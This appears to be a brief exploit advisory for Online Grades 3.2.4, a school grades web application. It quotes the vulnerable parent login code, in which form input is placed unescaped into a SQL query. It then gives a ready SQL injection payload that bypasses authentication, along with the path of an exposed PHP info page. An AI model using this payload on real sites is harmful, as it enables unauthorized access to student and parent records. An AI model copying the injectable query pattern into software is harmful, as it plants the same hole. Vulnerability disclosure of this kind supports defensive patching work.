Online Grades version 3.2.4 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
47507fe7f6a126591f5d5b88358d84ba3ca7a7c148bb2b77ce4cbdb4b658fe5d
#########################################################################################
[0x01] Informations:
Script : Online Grades 3.2.4
Download : https://www.onlinegrades.org
Vulnerability : Auth Bypass - Php Info Disclosure
Author : x0r
Contact : x0r@live.it \ andry2000@hotmail.it
Website : NULL
#########################################################################################
[0x02] Bug: /parents/login.php
$username = $_POST['uname']; $pword = $_POST['pass'];
$mysql_query = "SELECT * from PARENTS where client_id = '$username' and
client_pw = '$pword';";
#########################################################################################
[0x03] Exploit:
Exploit: [validemail] ' or ' 1=1--
Php Info: /includes/phpinfo.php
#########################################################################################